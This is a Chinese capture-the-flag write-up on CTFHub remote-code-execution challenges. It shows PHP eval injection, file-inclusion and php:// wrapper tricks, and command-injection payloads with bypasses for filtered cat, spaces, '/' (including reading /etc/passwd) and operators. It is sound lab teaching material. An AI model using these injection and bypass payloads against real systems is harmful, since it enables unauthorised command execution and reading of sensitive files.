当前位置: 首页 > news >正文

深入解析:CTFHub-RCE漏洞wp

深入解析:CTFHub-RCE漏洞wp

引言

题目共有如下类型

什么是RCE漏洞

RCE漏洞,全称是 Remote Code Execution 漏洞,翻译成中文就是 远程代码执行 漏洞。顾名思义,这是一种安全漏洞,允许攻击者在受害者的系统上远程执行任意代码

eval执行

分析源码:

 

执行命令查看当前目录

?cmd=system("ls");

查看根目录或者上级目录一个一个查找

?cmd=system("ls /");
?cmd=system("ls ../../../");

发现flag文件

cat /flag_8751 即可

文件包含

文件包含

源码审计



i have a shell, how to use it ? //提示有个shell.txt文件,内容为

利用文件包含读取 shell.txt

先了解一下 **REQUEST∗∗函数,是PHP中一个非常方便的超级全局变量,它处理来自用户输入的数据。具体来说,‘_REQUEST** 函数,是PHP 中一个非常方便的超级全局变量,它处理来自用户输入的数据。具体来说,`REQUEST函数,是PHP中一个非常方便的超级全局变量,它处理来自用户输入的数据。具体来说,_REQUEST` 变量包含了通过 GETPOSTCOOKIE 方法传递的数据 ,所以可以利用 POST或cookie 传入 ctfhub 变量

查看 根目录

查找 flag

php://input

源码分析


// 给了应该phpinfo.php超链接

查看 phpinfo.php 文件,发现此处

抓包 构造命令执行 ,因为有 php://input ,故会执行传入的 php代码

查看 flag

这里也可以利用 php伪协议 ,会得到一串 base64加密的flag ,解密即可

或者:

读取源代码

源码审计


i don't have shell, how to get flag?
flag in /flag                             //flag在根目录

php伪协议 读取flag

?file=php://filter/read=/resource=/flag

远程包含

源码审计

给了一个 phpinfo() 界面,根据题目提示,还是文件包含题,抓包利用 php;//input 读取

查看 根目录

读取 flag

命令注入

  • 这里需要了解一下常见的命令分隔符

  • ; : 无论前面是否执行,后面都执行

  • ||(逻辑或): 前命令失败执行后命令,如果前命令成功则不执行后命令

  • | : 前者结果作为后者参数使用

  • **& & :**前命令成功执行后命令,如果失败则不执行后命令

  • \n: 换行符,url编码%0a

  • %0a (换行)

  • %0d (回车)

无过滤

没有做任何过滤

ping 一下

查看 该目录 ,使用 127.0.0.1; ls 也是可以的

查看 26398804916519.php

127.0.0.1 | cat 26398804916519.php

发现 flag

过滤cat

查看源码:

查看当前目录

因为cat被过滤了,此系统是linux操作系统,所以可以使用cat命令的平替,如 nl tac c\at less more tail

nl 查看,得到 flag

或者使用转义符 \ 绕过 也可以得到flag,会将c\at 分为 两个字符串 ,则绕过cat过滤

过滤空格

查看源码

先查看当前目录,得到flag文件 flag_11971489425983.php

这里介绍几个绕过空格的方法

$IFS$9   %09    <>    <     {cat,flag}

可以绕过空格

127.0.0.1;cat$IFS$9flag_11971489425983.php

过滤目录分隔符

几种常见的 / 符号绕过方法

改变工作目录:cd xxx   避免使用 / 符号
环境变量截取: ${PATH:0:1}   ${HOME:0:1}
编码绕过:8进制: $(printf "\57")    16进制: $'\x2f'      $'\57'
调用命令生成:a=$(printf "/"); cat ${a}etc${a}passwd     cat  `echo /`etc`echo /`passwd
通配符替代(部分路径已知):/???/cat /???/passwd            //匹配 /bin/cat
利用反斜杠:cat \/etc\/passwd
协议替代:file_get_contents('glob:///*');

提示:

源码

查看当前目录

进入该目录并查看

执行以下命令读取flag文件

127.0.0.1;cd flag_is_here;cat flag_29914267619184.php

得到flag

过滤运算符

查看源码,可以利用 绕过

查看当前目录

执行以下命令

127.0.0.1;cat flag_4351260182213.php

得到flag

综合过滤练习

源码审计

利用换行符 %0a绕过 查看当前目录

查看根目录,没有有用信息,flag应该存在 flag_is_here 目录下

执行以下命令

?ip=127.0.0.1%0acd$IFS$9f\lag_is_here%0als         //flag被过滤,需要绕过

查看该flag

?ip=127.0.0.1%0acd$IFS$9f\lag_is_here%0anl$IFS$9f\lag_172132798218075.php  //绕过cat

http://www.jsqmd.com/news/325317/

相关文章:

  • 单片机嵌入式试题(第27期)设计可移植、可配置的外设驱动框架的关键要点
  • 【AI集成】深度解析分布式多语言会议/实时翻译/智能纪要生成架构
  • 从工程实践看金融级分布式清算系统的高可用与幂等设计
  • 2026佛山地区断桥铝门窗10大品牌排名,安柏瑞门窗靠谱之选
  • 销售老鸟最怕:一身武艺,在机器人报表前无处施展。
  • 分析研究院转让服务,哪家性价比高,费用怎么算?
  • 输入用户对产品的反馈评论,自动提取关键词,分析用户对创新功能的满意度。
  • 执行案件AI管理服务系统:用技术打通公平正义“最后一公里”
  • 海南广告公司哪家强?2026年海南广告公司推荐与评价,解决技术落后与生态适配核心痛点
  • 2026年海南广告公司推荐:基于文旅与跨境行业深度评价,附海口三亚等地服务排名
  • 选购优质LED灯具,需关注这些关键技术指标
  • 2026年海南广告公司推荐:多场景实战评测,破解获客成本高昂与转化率低下痛点
  • 如何选择靠谱的郑州广告公司?2026年推荐与评测,解决服务与效率核心痛点
  • 写给想做自媒体的你避开这7个坑,少走2年弯路
  • 实用指南:Java爬虫性能优化:以喜马拉雅音频元数据抓取为例
  • 2026年郑州广告公司推荐:本地企业增长痛点评测,涵盖多场景营销与效果排名
  • 技术驱动转型:IACheck的AI审核如何成为生产检测行业提质增效的新引擎
  • 不同场景该选哪家?2026年郑州广告公司推荐与评价,应对预算与效果匹配痛点
  • 分析好用的变压器服务商厂家,雄县鸿德电气设备价格情况怎样?
  • 专科生必看!9个高效降aigc工具推荐,避坑指南!
  • 海港
  • 救命神器9个AI论文工具,专科生毕业论文救星!
  • 2026年热门GEO加工厂年度排名,合作案例多的厂家有哪些?
  • wep_allowed = false
  • 基于Spring Boot的艺术培训机构信息管理系统设计与实现(任务书)
  • ETASOLUTIONS钰泰 ETA3425S2F SOT23-5 DC-DC电源芯片
  • 变压器定制厂家怎么选择,雄县鸿德电气设备优势在哪
  • 2026年冷库货架厂家推荐,中恒智能专业生产值得选吗
  • 聊聊佛山靠谱的PVC天沟水槽服务商,哪家性价比高
  • Anthropic最新思考,什么时候才真的需要构建多智能体?